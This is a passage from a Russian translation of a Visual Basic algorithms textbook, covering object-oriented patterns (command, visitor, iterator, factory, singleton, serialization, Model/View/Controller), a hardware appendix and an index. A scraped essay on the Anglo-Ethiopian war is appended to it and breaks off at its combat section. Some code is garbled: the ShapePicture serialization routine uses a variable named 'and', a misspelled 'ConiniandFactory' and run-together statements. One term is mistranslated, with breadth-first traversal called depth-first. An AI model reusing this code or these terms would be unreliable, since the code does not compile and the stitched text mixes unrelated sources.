m_Employee.Name = New_Name
End Property
Класс Manager также может изменять результат, возвращаемый делегированной функцией, или выдавать результат сама. Например, в следующем коде показано, как класс Employee возвращает строку текста с данными о сотруднике.
Public Function TextValues() As String
Dim txt As String
txt = m_Name & vbCrLf
txt = txt & " " & m_SSN & vbCrLf
txt = txt & " " & Format$(m_Salary, "Currency") & vbCrLf
TextValues = txt
End Function
Класс Manager использует функцию TextValues объекта Employee, но добавляет перед возвратом информацию о секретаре в строку результата.
Public Function TextValues() As String
Dim txt As String
txt = m_Employee.TextValues
txt = txt & " " & m_Secretary & vbCrLf
TextValues = txt
End Function
Программа Inherit демонстрирует классы Employee и Manager. Интерфейс программы не представляет интереса, но ее код включает простые определения классов Employee и Manager.
Парадигмы ООП
В первой главе мы дали определение алгоритма как «последовательности инструкций для выполнения какоголибо задания». Несомненно, класс может использовать алгоритмы в своих процедурах и функциях. Например, можно использовать класс для упаковки в него алгоритма. Некоторые из программ, описанных в предыдущих главах, используют классы для инкапсуляции сложных алгоритмов.
=========361
Классы также позволяют использовать новый стиль программирования, при котором несколько объектов могут работать совместно для выполнения задачи. В этом случае может быть бессмысленным задание последовательности инструкций для выполнения задачи. Более адекватным может быть задание модели поведения объектов, чем сведение задачи к последовательности шагов. Для того чтобы отличать такое поведение от традиционных алгоритмов, мы назовем их «парадигмами».
Следующие раздела описывают некоторые полезные объектноориентированные парадигмы. Многие из них ведут начало из других объектноориентированных языков, таких как C++ или Smalltalk, хотя они могут также использоваться в Visual Basic.
Управляющие объекты
Управляющие объекты (command) также называются объектами действия (action objects), функций (function objects) или функторами (functors). Управляющий объект представляет какоелибо действие. Программа может использовать метод Execute (Выполнить) для выполнения объектом этого действия. Программе не нужно знать ничего об этом действии, она знает только, что объект имеет метод Execute.
Управляющие объекты могут иметь множество интересных применений. Программа может использовать управляющий объект для реализации:
Настраиваемых элементов интерфейса;
Макрокоманд;
Ведения и восстановления записей;
Функций «отмена» и «повтор».
Чтобы создать настраиваемый интерфейс, форма может содержать управляющий массив кнопок. Во время выполнения программы форма может загрузить надписи на кнопках и создать соответствующий набор управляющих объектов. Когда пользователь нажимает на кнопку, обработчику событий кнопки нужно всего лишь вызвать метод Execute соответствующего управляющего объекта. Детали происходящего находятся внутри класса управляющего объекта, а не в обработчике событий.
Программа Command1 использует управляющие объекты для создания настраиваемого интерфейса для нескольких не связанных между собой функций. При нажатии на кнопку программа вызывает метод Execute соответствующего управляющего объекта.
Программа может использовать управляющие объекты для создания определенных пользователем макрокоманд. Пользователь задает последовательность действий, которые программа запоминает в коллекции в виде управляющих объектов. Когда затем пользователь вызывает макрокоманду, программа вызывает методы Execute объектов, которые находятся в коллекции.
Управляющие объекты могут обеспечивать ведение и восстановление записей. Управляющий объект может при каждом своем вызове записывать информацию о себе в логфайл. Если программа аварийно завершит работы, она может затем использовать записанную информацию для восстановления управляющих объектов и выполнения их для повторения последовательности команд, которая выполнялась до сбоя программы.
И, наконец, программа может использовать набор управляющих объектов для реализации функций отмены (undo) и повтора (redo).
=========362
Программа использует переменную LastCmd для отслеживания последнего управляющего объекта в коллекции. Если вы выбираете команду Undo (Отменить) в меню Draw (Рисовать), то программа уменьшает значение переменной LastCmd на единицу. Когда программа потом выводит рисунок, она вызывает только объекты, стоящие до объекта с номером LastCmd.
Если вы выбираете команду Redo (Повторить) в меню Draw, то программа увеличивает значение переменной LastCmd на единицу. Когда программа выводит рисунок, она выводит на один объект больше, чем раньше, поэтому отображается восстановленный рисунок.
При добавлении новой фигуры программа удаляет любые команды из коллекции, которые лежат после позиции LastCmd,. затем добавляет новую команду рисования в конце и запрещает команду Redo, так как нет команд, которые можно было бы отменить. На рис. 13.1 показано окно программы Command2 после добавления новой фигуры.
Контролирующий объект
Контролирующий объект (visitor object) проверяет все элементы в составном объекте (aggregate object). Процедура, реализованная в составном классе, обходит все объекты, передавая каждый из них контролирующему объекту в качестве параметра.
Например, предположим, что составной объект хранит элементы в связном списке. Следующий код показывает, как его метод Visit обходит список, передавая каждый объект в качестве параметра методу Visit контролирующего объекта ListVisitor:
Public Sub Visit(obj As ListVisitor)
Dim cell As ListCell
Set cell = TopCell
Do While Not (cell Is Nothing)
obj.Visit cell
Set cell = cell.NextCell
Loop
End Sub
@Рис. 13.1. Программа Command2
=========363
Следующий код демонстрирует, как класс ListVisitor может выводить на экран значения элементов в окне Immediate (Срочно).
Public Sub Visit(cell As ListCell)
Debug.Print cell.Value
End Sub
Используя парадигму контролирующего объекта, составной класс определяет порядок, в котором обходятся элементы. Составной класс может определять несколько методов для обхода содержащих его элементов. Например, класс дерева может обеспечивать методы VisitPreorder (Прямой обход), VisitPostorder (Обратный обход), VisitInorder (Симметричный обход) и VisitBreadthFirst (Обход в глубину) для обхода элементов в различном порядке.
Итератор
Итератор обеспечивает другой метод обхода элементов в составном объекте. Объектитератор обращается к составному объекту для обхода его элементов, и в этом случае итератор определяет порядок, в котором проверяются элементы. С составным классом могут быть сопоставлены несколько классов итераторов для того, чтобы выполнять различные обходы элементов составного класса.
Чтобы выполнить обход элементов, итератор должен представлять порядок, в котором элементы записаны, чтобы определить порядок их обхода. Если составной класс представляет собой связный список, то объектитератор должен знать, что элементы находятся в связном списке, и должен уметь перемещаться по списку. Так как итератору известны детали внутреннего устройства списка, это нарушает скрытие данных составного объекта.
Вместо того чтобы каждый класс, которому нужно проверять элементы составного класса, реализовал обход самостоятельно, можно сопоставить составному классу класс итератора. Класс итератора должен содержать простые процедуры MoveFirst (Переместиться в начало), MoveNext (Переместиться на следующий элемент), EndOfList (Переместиться в конец списка) и CurrentItem (Текущий элемент) для обеспечения косвенного доступа к списку. Новые классы могут включать в себя экземпляр класса итератора и использовать его методы для обхода элементов составного класса. На рис. 13.2 схематически показано, как новый объект использует объектитератор для связи со списком.
Программа IterTree, описанная ниже, использует итераторы для обхода полного двоичного дерева. Класс Traverser (Обходчик) содержит ссылку на объектитератор. Они использует обеспечиваемые итератором процедуры MoveFirst, MoveNext, CurrentCaption и EndOfTree для получения списка узлов в дереве.
@Рис. 13.2. Использование итератора для косвенной связи со списком
=========364
Итераторы нарушают скрытие соответствующих им составных объектов, в отличие от новых классов, которые содержат итераторы. Для того, чтобы избавиться от потенциальной путаницы, можно рассматривать итератор как надстройку над составным объектом.
Контролирующие объекты и итераторы обеспечивают выполнение похожих функций, используя различные подходы. Так как парадигма контролирующего объекта оставляет детали составного объекта скрытыми внутри него, она обеспечивает лучшую инкапсуляцию. Итераторы могут быть полезны, если порядок обхода может часто изменяться или он должен переопределяться во время выполнения программы. Например, составной объект может использовать методы порождающего класса (который описан позднее) для создания объектаитератора в процессе выполнения программы. Содержащий итератор класс не должен знать, как создается итератор, он всего лишь использует методы итератора для доступа к элементам составного объекта.
Дружественный класс
Многие классы тесно работают с другими. Например, класс итератора тесно взаимодействует с составным классом. Для выполнения работы, итератор должен нарушать скрытие составного класса. При этом, хотя эти связанные классы иногда должны нарушать скрытие данных друг друга, другие классы должны не иметь такой возможности.
Дружественный класс (friend class) — это класс, имеющий специальное разрешение нарушать скрытие данных для другого класса. Например, класс итератора является дружественным классом для соответствующего составного класса. Ему, в отличие от других классов, разрешено нарушать скрытие данных для составного класса.
В 5й версии Visual Basic появилось зарезервированное слово Friend для разрешения ограниченного доступа к переменным и процедурам, определенным внутри модуля. Элементы, определенные при помощи зарезервированного слова Friend, доступны внутри проекта, но не в других проектах. Например, предположим, что вы создали классы LinkedList (Связный список) и ListIterator (Итератор списка) в проекте ActiveX сервера. Программа может создать сервер связного списка для управления связными списками. Порождающий метод класса LinkedList может создавать объекты типа ListIterator для использования в программе.
Класс LinkedList может обеспечивать в программе средства для работы со связными списками. Этот класс объявляет свои свойства и методы открытыми, чтобы их можно было использовать в основной программе. Класс ListIterator позволяет программе выполнять итерации над объектами, которыми управляет класс LinkeList. Процедуры, используемые классом ListIterator для оперирования объектами LinkedList, объявляются как дружественные в модуле LinkedList. Если классы LinkedList и ListIterator создаются в одном и том же проекте, то класс ListIterator может использовать эти дружественные процедуры. Поскольку основная программа находится в другом проекте, она этого сделать не может.
Этот очень эффективный, но довольно громоздкий метод. Она требует создания двух проектов, и установки одного сервера ActiveX. Он также не работает в более ранних версиях Visual Basic.
Наиболее простой альтернативой было бы соглашение о том, что только дружественные классы могут нарушать скрытие данных друг друга. Если все разработчики будут придерживаться этого правила, то проектом все еще можно будет управлять. Тем не менее, искушение обратиться напрямую к данным класса LinkedList может быть сильным, и всегда существует вероятность, что ктонибудь нарушит скрытие данных изза лени или по неосторожности.
Другая возможность заключается в том, чтобы дружественный объект передавал себя другому классу в качестве параметра. Передавая себя в качестве параметра, дружественный класс тем самым показывает, что он является таковым. Программа Fstacks использует этот метод для реализации стеков.
=======365
При использовании этого метода все еще можно нарушить скрытие данных объекта. Программа может создать объект дружественного класса и использовать его в качестве параметра, чтобы обмануть процедуры другого объекта. Тем не менее, это достаточно громоздкий процесс, и маловероятно, что разработчик сделает так случайно.
Интерфейс
В этой парадигме один из объектов выступает в качестве интерфейса (interface) между двумя другими. Один объект может использовать свойства и методы первого объекта для взаимодействия со вторым. Интерфейс иногда также называется адаптером (adapter), упаковщиком (wrapper), или мостом (bridge). На рис. 13.3 схематически изображена работа интерфейса.
Интерфейс позволяет двум объектам на его концах изменяться независимо. Например, если свойства объекта слева на рис. 13.3 изменятся, интерфейс должен быть изменен, а объект справа — нет.
В этой парадигме процедуры, используемые двумя объектами, поддерживаются разработчиками, которые отвечают за эти объекты. Разработчик, который реализует левый объект, также занимается реализацией процедур интерфейса, которые взаимодействуют с левым объектом.
Фасад
Фасад (Facade) аналогичен интерфейсу, но он обеспечивает простой интерфейс для сложного объекта или группы объектов. Фасад также иногда называется упаковщиком (wrapper). На рис. 13.4. показана схема работы фасада.
Разница между фасадом и интерфейсом в основном умозрительная. Основная задача интерфейса — обеспечение косвенного взаимодействия между объектами, чтобы они могли развиваться независимо. Основная задача фасада — облегчение использования какихто сложных вещей за счет скрытия деталей.
Порождающий объект
Порождающий объект (Factory) — это объект, который создает другие объекты. Порождающий метод — это процедура или функция, которая создает объект.
Порождающие объекты наиболее полезны, если два класса должны тесно работать вместе. Например, составной класс может содержать порождающий метод, который создает итераторы для него. Порождающий метод может инициализировать итератор таким образом, чтобы он был готов к работе с экземпляром класса, который его создал.
@Рис. 13.3 Интерфейс
========366
@Рис. 13.4. Фасад
Программа IterTree создает полное двоичное дерево, записанное в массиве. После нажатия на одну из кнопок, задающих направление обхода, программа создает объект Traverser (Обходчик). Она также использует один из порождающих методов дерева для создания соответствующего итератора. Объект Traverser использует итератор для обхода дерева и вывода списка узлов в правильном порядке. На рис. 13.5 приведено окно программы IterTree, показывающее обратный обход дерева.
Единственный объект
Единственный объект (singleton object) — это объект, который существует в приложении в единственном экземпляре. Например, в Visual Basic определен класс Printer (Принтер). Он также определяет единственный объект с тем же названием. Этот объект представляет принтер, выбранный в системе по умолчанию. Так как в каждый момент времени может быть выбран только один принтер, то имеет смысл определить объект Printer как единственный объект.
Один из способов создания единственного объекта заключается в использовании процедуры, работающей со свойствами в модуле BAS. Эта процедура возвращает ссылку на объект, определенный внутри модуля как закрытый. Для других частей программы эта процедура выглядит как просто еще один объект.
@Рис. 13.5. Программа IterTree, демонстрирующая обратный обход
=======367
Программа WinList использует этот подход для создания единственного объекта класса WinListerClass. Объект класса WinListerClass представляет окна в системе. Так как операционная система одна, то нужен только один объект класса WinListerClass. Модуль WinList.BAS использует следующий код для создания единственного объекта с названием WindowLister.
Private m_WindowLister As New WindowListerClass
Property Get WindowLister() As WindowListerClass
Set WindowLister = m_WindowLister
End Property
Единственный объект WindowLister доступен во всем проекте. Следующий код демонстрирует, как основная программа использует свойство WindowList этого объекта для вывода на экран списка окон.
WindowListText.Text = WindowLister.WindowList
Преобразование в последовательную форму
Многие приложения сохраняют объекты и восстанавливают их позднее. Например, приложение может сохранять копию своих объектов в текстовом файле. При следующем запуске программы, она считывает это файл и загружает объекты.
Объект может содержать процедуры, которые считывают и записывают его в файл. Общий подход может заключаться в том, чтобы создать процедуры, которые сохраняют и восстанавливают данные объекта, используя строку. Поскольку запись данных объекта в одной строке преобразует объект в последовательность символов, этот процесс иногда называется преобразованием в последовательную форму (serialization).
Преобразование объекта в строку обеспечивает большую гибкость основной программы. При этом она может сохранять и считывать объекты, используя текстовые файлы, базу данных или область памяти. Она может переслать представленный таким образом объект по сети или сделать его доступным на Webстранице. Программа или элемент ActiveX на другом конце может использовать преобразование объекта в строку для воссоздания объекта. Программа также может дополнительно обработать строку, например, зашифровать ее после преобразования объекта в строку и расшифровать перед обратным преобразованием.
Один из подходов к преобразованию объекта в последовательную форму заключается в том, чтобы объект записал все свои данные в строку заданного формата. Например, предположим, что класс Rectangle (Прямоугольник) имеет свойства X1, Y1, X2 и Y2. Следующий код демонстрирует, как класс может определять процедуры свойства Serialization:
Property Get Serialization() As String
Serialization = _
Format$(X1) & ";" & Format$(Y1) & ";" & _
Format$(X2) & ";" & Format$(Y2) & ";"
End Property
Property Let Serialization(txt As String)
Dim pos1 As Integer
Dim pos2 As Integer
pos1 = InStr(txt, ";")
X1 = CSng(Left$(txt, pos1 - 1))
pos2 = InStr(pos1 + 1, txt, ";")
Y1 = CSng(Mid$(txt, pos1 + 1, pos2 – pos1 - 1))
pos1 = InStr(pos2 + 1, txt, ";")
X2 = CSng(Mid$(txt, pos2 + 1, pos1 - pos2 - 1))
pos2 = InStr(pos1 + 1, txt, ";")
Y2 = CSng(Mid$(txt, pos1 + 1, pos2 – pos1 - 1))
End Property
Этот метод довольно простой, но не очень гибкий. По мере развития программы, изменения в структуре объектов могут заставить вас перетранслировать все сохраненные ранее преобразованные в последовательную форму объекты. Если они находятся в файлах или базах данных, для загрузки старых данных и записи их в новом формате может потребоваться написание программконверторов.
Более гибкий подход заключается в том, чтобы сохранять вместе со значениями элементов данных объекта их имена. Когда объект считывает данные, преобразованные в последовательную форму, он использует имена элементов для определения значений, который необходимо установить. Если позднее в определение элемента будут добавлены какиелибо элементы, или удалены из него, то не придется преобразовывать старые данные. Если новый объект загрузит старые данные, то он просто проигнорирует не поддерживаемые более значения.
Определяя значения данных по умолчанию, иногда можно уменьшить размер преобразованных в последовательную форму объектов. Процедура get свойства Serialization сохраняет только значения, которые отличаются от значений по умолчанию. Перед тем, как процедура let свойства начнет выполнение преобразования в последовательную форму, она инициализирует все элементы объекта значениями по умолчанию. Значения, не равные значениям по умолчанию, обновляются по мере обработки данных процедурой.
Программа Shapes использует этот подход для сохранения и загрузки с диска рисунков, содержащих эллипсы, линии, и прямоугольники. Объект ShapePicture представляет весь рисунок целиком. Он содержит коллекцию управляющих объектов, которые представляют различные фигуры.
Следующий код демонстрирует процедуры свойства Serialization объекта ShapePicture. Объект ShapePicture сохраняет имя типа для каждого из типов объектов, а затем в скобках — представление объекта в последовательной форме.
Property Get Serialization() As String
Dim txt As String
Dim i As Integer
For i = 1 To LastCmd
txt = txt & _
TypeName(CmdObjects(i)) & "(" & _
CmdObjects(i).Serialization & ")"
Next I
Serialization = txt
End Property
==========369
Процедура let свойства Serialization использует подпрограмму GetSerialization для чтения имени объекта и списка данных в скобках. Например, если объект ShapePicture содержит команду рисования прямоугольника, то его представление в последовательной форме будет включать строку “RectangleCMD”, за которой будут следовать данные, представленные в последовательной форме.
Процедура использует подпрограмму CommandFactory для создания объекта соответствующего типа, а затем заставляет новый объект преобразовать себя из последовательной формы представления.
Property Let Serialization(txt As String) Dim pos As Integer Dim token_name As String Dim token_value As String Dim and As Object
' Start a new picture.
NewPicture
' Read values until there are no more.
GetSerialization txt, pos, token_name, token_value Do While token_name <> ""
' Make the object and make it unserialize itself.
Set and = ConiniandFactory(token_name)
If Not (and Is Nothing) Then _
and.Serialization = token_value
GetSerialization txt, pos, token_name, tokerL-value Loop
LastCmd = CmdObjects.Count End Property
Парадигма Модель/Вид/Контроллер.
Парадигма Модель/Вид/Контроллер (МВК) (Model/View/Controller) позволяет программе управлять сложными соотношениями между объектами, которые сохраняют данные, объектами, которые отображают их на экране, и объектами, которые оперируют данными. Например, приложение работы с финансами может выводить данные о расходах в виде таблицы, секторной диаграммы, или графика. Если пользователь изменяет значение в таблице, приложение должно автоматически обновить изображение на экране. Может также понадобиться записать измененные данные на диск.
Для сложных систем управление взаимодействием между объектами, которые хранят, отображают и оперируют данными, может быть достаточно запутанным. Парадигма Модель/Вид/Контроллер разбивает взаимодействия, так что можно работать с ними по отдельности, при этом используются три типа объектов: модели, виды, и контроллеры.
Модели
Модель (Model) представляет данные, обеспечивая методы, которые другие объекты могут использовать для проверки и изменения данных. В приложении работы с финансовыми данными, модель содержит данные о расходах. Она обеспечивает процедуры для просмотра и изменения значений расходов и ввода новых значений. Она также может обеспечивать функции для вычисления суммарных величин, таких как полные издержки, расходы по подразделениям, средние расходы за месяц, и так далее
Модель включает в себя набор видов, которые отображают данные. При изменении данных, модель сообщает об этом видам, которые изменяют изображение на экране соответствующим образом.
Виды
Вид (View) отображает представленные в модели данные. Так как виды обычно выводят данные для просмотра пользователем, иногда удобнее создавать их, используя форму, а не класс.
Когда программа создает вид, она должна добавить его к набору видов модели.
Контроллеры
Контроллер (Controller) изменяет данные в модели. Контроллер должен всегда обращаться к данным модели через ее открытые методы. Эти методы могут затем сообщать об изменении видам. Если контроллер изменял бы данные модели непосредственно, то модель не смогла бы сообщить об этом видам.
Виды/Контроллеры
Многие объекты одновременно отображают и изменяют данные. Например, текстовое поле позволяет пользователю вводить и просматривать данные. Форма, содержащая текстовое поле, является одновременно и видом, и контроллером. Переключатели, поля выбора опций, полосы прокрутки, и многие другие элементы пользовательского интерфейса позволяют одновременно просматривать и оперировать данными.
Видами/контроллерами проще всего управлять, если попытаться максимально разделить функции просмотра и управления. Когда объект изменяет данные, он не должен сам обновлять изображение на экране. Он может сделать это позднее, когда модель сообщит ему как виду о произошедшем изменении.
Эти методы достаточно громоздки для реализации стандартных объектов пользовательского интерфейса, таких как текстовые поля. Когда пользователь вводит значение в текстовом поле, оно немедленно обновляется, и выполнятся его обработчик события Change. Этот обработчик событий может модель об изменении. Модель затем сообщает виду/контроллеру (выступающему теперь как вид) о произошедшем изменении. Если при этом объект обновит текстовое поле, то произойдет еще одно событие Change, о котором снова будет сообщено модели и программа войдет в бесконечный цикл.
Чтобы предотвратить эту проблему, методы, изменяющие данные в модели, должны иметь необязательный параметр, указывающий на контроллер, который вызвал эти изменения. Если виду/контроллеру требуется сообщить об изменении, которое он вызывает, он должен передать значение Nothing процедуре, вносящей изменения. Если этого не требуется, то в качестве параметра объект должен передавать себя.
=========371
@Рис. 13.6. Программа ExpMVC
Программа ExpMVC, показанная на рис. 13.6, использует парадигму Модель/Вид/Контроллер для вывода данных о расходах. На рисунке показаны три вида различных типов. Вид/контроллер TableView отображает данные в таблице, при этом можно изменять названия статей расходов и их значения в соответствующих полях.
Вид/контроллер GraphView отображает данные при помощи гистограммы, при этом можно изменять значения расходов, двигая столбики при помощи мыши вправо.
Вид PieView отображает секторную диаграмму. Это просто вид, поэтому его нельзя использовать для изменения данных.
Резюме
Классы позволяют программистам на Visual Basic рассматривать старые задачи с новой точки зрения. Вместо того чтобы представлять себе длинную последовательность заданий, которая приводит к выполнению задачи, можно думать о группе объектов, которые работают, совместно выполняя задачу. Если задача правильно разбита на части, то каждый из классов по отдельности может быть очень простым, хотя все вместе они могут выполнять очень сложную функцию. Используя описанные в этой главе парадигмы, вы можете разбить классы так, чтобы каждый из них оказался максимально простым.
==============372
Требования к аппаратному обеспечению
Для запуска и изменения примеров приложений вам понадобится компьютер, который удовлетворяет требованиям Visual Basic к аппаратному обеспечению.
Алгоритм выполняются с различной скоростью на компьютерах разных конфигураций. Компьютер с процессором Pentium Pro и 64 Мбайт памяти будет быстрее компьютера с 386 процессором и 4 Мбайт памяти. Вы быстро узнаете ограничения вашего оборудования.
Выполнение программ примеров
Один из наиболее полезных способов выполнения программ примеров — запускать их при помощи встроенных средств отладки Visual Basic. Используя точки останова, просмотр значений переменных и другие свойства отладчика, вы можете наблюдать алгоритмы в действии. Это может быть особенно полезно для понимания наиболее сложных алгоритмов, таких как алгоритмы работы со сбалансированными деревьями и сетевые алгоритмы, представленные в 7 и 12 главах соответственно.
Некоторые и программ примеров создают файлы данных или временные файлы. Эти программы помещают такие файлы в соответствующие директории. Например, некоторые из программ сортировки, представленные в 9 главе, создают файлы данных в директории Src\Ch9/. Все эти файлы имеют расширение “.DAT”, поэтому вы можете найти и удалить их в случае необходимости.
Программы примеров предназначены только для демонстрационных целей, чтобы помочь вам понять определенные концепции алгоритмов, и в них не почти не реализована обработка ошибок или проверка данных. Если вы введете неправильное решение, программа может аварийно завершить работу. Если вы не знаете, какие данные допустимы, воспользуйтесь для получения инструкций меню Help (Помощь) программы.
========374
A
addressing
indirect, 49
open, 314
adjacency matrix, 86
aggregate object, 382
ancestor, 139
array
irregular, 89
sparse, 92
triangular, 86
augmenting path, 363
B
B+Tree, 12
balanced profit, 222
base case, 101
best case, 27
binary hunt and search, 294
binary search, 286
branch, 139
branchandbound technique, 204
bubblesort, 254
bucketsort, 275
C
cells, 47
child, 139
circular referencing problem, 58
collision resolution policy, 299
command, 380
complexity theory, 17
controller, 391
countingsort, 273
critical path, 359
cycle, 331
D
data abstraction, 372
decision tree, 203
delegation, 378
descendant, 139
E
edge, 331
encapsulation, 371
exhaustive search, 204, 282
expected case, 27
F
facade, 386
factorial, 100
factory, 386
fake pointer, 32, 65
fat node, 12, 140
Fibonacci numbers, 105
firehouse problem, 239
FirstInFirstOut, 72
forward star, 12, 90, 143
friend class, 384
functors, 380
G
game tree, 204
garbage collection, 43
garbage value, 43
generic, 374
graph, 138, 331
greatest common divisor, 103
greedy algorithms, 339
H
Hamiltonian path, 237
hashing, 298
heap, 266
heapsort, 265
heuristic, 204
Hilbert curves, 108
hillclimbing, 219
I
implements, 375
incremental improvements, 225
inheritance, 378
insertionsort, 251
interface, 385
interpolation search, 288
interpolative hunt and search, 295
K
knapsack problem, 212
L
label correcting, 342
label setting, 342
LastInFirstOut list, 69
leastcost, 220
linear probing, 314
link, 331
list
circular, 56
doubly linked, 58
linked, 36
threaded, 61
unordered, 36, 43
M
mergesort, 263
minimal spanning tree, 338
minimax, 206
model, 391
Model/View/Controller, 390
Monte Carlo search, 223
N
network, 331
capacitated, 361
capacity, 361
connected, 332
directed, 331
flow, 361
residual, 362
node, 139, 331
degree, 139
internal, 139
sibling, 139
O
octtree, 172
optimum
global, 230
local, 230
P
page file, 30
parent, 139
partition problem, 236
path, 331
pointers, 32
pointtopoint shortest path, 352
polymorphism, 371, 374
primary clustering, 317
priority queue, 268
probe sequence, 300
pruning, 212
pseudorandom probing)., 324
Q
quadratic probing, 322
quadtree, 138, 165
queue, 72
circular, 75
multi-headed, 83
priority, 80
quicksort, 258
R
random search, 223
recursion
direct, 99
indirect, 25, 99
multiple, 24
tail recursion, 121
recursive procedure, 23
redundancy, 368
reference counter, 33
rehashing, 327
relatively prime, 103
residual capacity, 362
reuse, 371, 378
S
satisfiability problem, 235
secondary clustering, 324
selectionsort, 248
sentinel, 52
serialization, 388
shortest path, 342
Sierpinski curves, 112
simulated annealing, 231
singleton object, 387
sink, 361
source, 361
spanning tree, 336
stack, 69
subtree, 139
T
tail recursion removal, 121
thrashing, 31
thread, 61
traveling salesman problem, 238
traversal
breadth-first, 149
depth-first, 149
inorder, 148
postorder, 148
preorder, 148
tree, 138
AVL tree, 174
B+tree, 192
binary, 140
bottom-up B-trees, 192
B-tree, 187
complete, 147
depth, 140
left rotation, 177
left-right rotation, 178
right rotation, 176
right-left rotation, 178
symmetrically threaded, 160
ternary, 140
threaded, 138
top-down B-tree, 192
traversing, 148
tries, 138
turn penalties, 354
U
unsorting, 250
V
view, 391
virtual memory, 30
visitor object, 382
W
work assignment, 369
worst case, 27
А
Абстракция данных, 372
Адресация
косвенная, 49
открытая, 314
Алгоритм
поглощающий, 339
Г
Гамильтонов путь, 237
Граф, 138, 331
Д
Делегирование, 378
Деревья, 138
АВЛ-деревья, 174
Б+деревья, 12, 192, 193
Б-деревья, 187
ветвь, 139
внутренний узел, 139
восьмеричные, 172
вращения, 176
двоичные, 140
дочерний узел, 139
игры, 204
квадродеревья, 165
корень, 139
лист, 139
нисходящие Б-деревья, 192
обратный обход, 148
обход, 148
обход в глубину, 149
обход в ширину, 149
поддерево, 139
полные, 147
порядок, 139
потомок, 139
предок, 139
представление нумерацией связей, 12, 143
прямой обход, 148
решений, 203
родитель, 139
с полными узлами, 12
с симметричными ссылками, 160
симметричный обход, 148
троичные, 140
узел, 139
упорядоченные, 153
Дружественный класс, 384
З
Задача
коммивояжера, 238
о выполнимости, 235
о пожарных депо, 239
о разбиении, 236
поиска Гамильтонова пути, 237
распределения работы, 369
формирования портфеля, 212
Значение
"мусорное", 43
И
Инкапсуляция, 372
К
Ключи
объединение, 244
сжатие, 244
Коллекция, 37
Кратчайший маршрут
двухточечный, 352
дерево кратчайшего маршрута, 341
для всех пар, 352, 353
коррекция меток, 342, 348
со штрафами за повороты, 352, 354
установка меток, 342, 344
Кривые
Гильберта, 108
Серпинского, 112
М
Массив
нерегулярный, 89
представление в виде прямой звезды, 90
разреженный, 92
треугольный, 86
Матрица смежности, 86
Метод
ветвей и границ, 204, 212
восхождения на холм, 219
минимаксный, 206
Монте-Карло, 223
наименьшей стоимости, 220
отжига, 231
полного перебора, 204
последовательных приближений, 225
сбалансированной прибыли, 222
случайного поиска, 223
эвристический, 204
Модель/Вид/Контроллер, 390
Н
Наибольший общий делитель, 103
Наследование, 378
О
Объект
вид, 391
единственный, 387
интерфейс, 385
итератор, 383
контролирующий, 382
контроллер, 391
модель, 391
порождающий, 386
преобразование в последовательную форму, 388
составной, 382
управляющий, 380
фасад, 386
Ограничение, 378
Оптимум
глобальный, 230
локальный, 230
Очередь, 72
многопоточная, 83
приоритетная, 80, 268
циклическая, 75
П
Память
виртуальная, 30
пробуксовка, 31
чистка, 43
Пирамида, 265
Повторное использование, 378
Поиск
двоичный, 286
интерполяционный, 288
методом полного перебора, 282
следящий, 294
Полиморфизм, 374
Потоки, 61
Проблема циклических ссылок, 58
Процедура
очистки памяти, 45
рекурсивная, 23
Псевдоуказатели, 32, 65
Р
Разрешение конфликтов, 299
Рекурсия
восходящая, 175
косвенная, 25, 99
многократная, 24
прямая, 99
условие остановки, 101
хвостовая, 121
С
Сеть, 331
избыточность, 368
источник, 361
кратчайший маршрут, 341
критический путь, 359
нагруженная, 361
наименьшее остовное дерево, 338
ориентированная, 331
остаточная, 362
остаточная пропускная способность, 362
остовное дерево, 336
поток, 361
пропускная способность, 361
простой путь, 332
путь, 331
расширяющий путь, 363
ребро, 331
связная, 332
связь, 331
сток, 361
узел, 331
цена связи, 331
цикл, 331
Сигнальная метка, 52
Системный стек, 26
Случай
наилучший, 27
наихудший, 27
ожидаемый, 27
Сортировка
блочная, 275
быстрая, 258
вставкой, 251
выбором, 248
пирамидальная, 265
подсчетом, 273
пузырьковая, 254
рандомизация, 250
слиянием, 263
Список
двусвязный, 58
многопоточный, 61
неупорядоченный, 36, 43
первый вошел-первый вышел, 72
первый вошел-последний вышел, 69
связный, 36
циклический, 56
Стек, 69
Странный аттрактор, 170
Счетчик ссылок, 33
Т
Теория
сложности алгоритмов, 17
хаоса, 170
Тестовая последовательность
вторичная кластеризация, 324
квадратичная проверка, 321
линейная проверка, 314
первичная кластеризация, 317
псевдослучайная проверка, 324
У
Указатели, 32, 36
Ф
Файл подкачки, 30
Факториал, 100
Х
Хеширование, 298
блоки, 303
открытая адресация, 314
разрешение конфликтов, 299
рехеширование, 327
связывание, 300
тестовая последовательность, 300
хеш-таблица, 298
Ч
Числа
взаимно простые, 103
Фибоначчи, 105
Я
Ячейка, 47 |
https://doc4web.ru/istoriya/angloefiopskaya-voyna.html | Англо-эфиопская война | https://doc4web.ru/uploads/files/208/95a188ba62d4d84f94b1cc9df672ade1.docx | files/95a188ba62d4d84f94b1cc9df672ade1.docx | План
Введение
1 Повод к войне
2 Статистика Англо-эфиопской войны
3 Боевые действия
4 Конец войны
Англо-эфиопская война
Введение
Англо-эфиопская война — военный конфликт между Эфиопией и Великобританией в середине XIX века.
1. Повод к войне
Во второй половине XIX века Эфиопия была одним из немногих африканских государств, сохранявших независимость. Многие европейские страны хотели видеть ее своей колонией. В 60-х гг. Эфиопия попала в сферу интересов Великобритании.
В то время Эфиопией правил император Теодрос II, который проводил политику укрепления и объединения страны. В октябре 1862 г. Теодрос II, чувствуя неминуемость войны с Великобританией, послал письмо королеве Виктории с просьбой о союзе. Император Эфиопии ждал ответа 2 года, но ответ не пришёл. Правительство Великобритании вело себя преднамеренно нагло и провокационно по отношению к правительству Эфиопии.
В 1864 г. император Теодрос II, не дождавшись ответа от королевы Виктории, в гневе заключил в тюрьму нескольких европейцев, среди которых были англичане. Великобритания решила использовать этот момент как повод к войне. После того, как в декабре 1867 г. власти арестовали весь дипломатический корпус англичан в Эфиопии, Великобритания решила незамедлительно действовать.
2. Статистика Англо-эфиопской войны
Информация взята из следующих книг:
Урланис Б. Ц. Войны и народонаселение Европы. — Москва., 1960.
3. Боевые действия
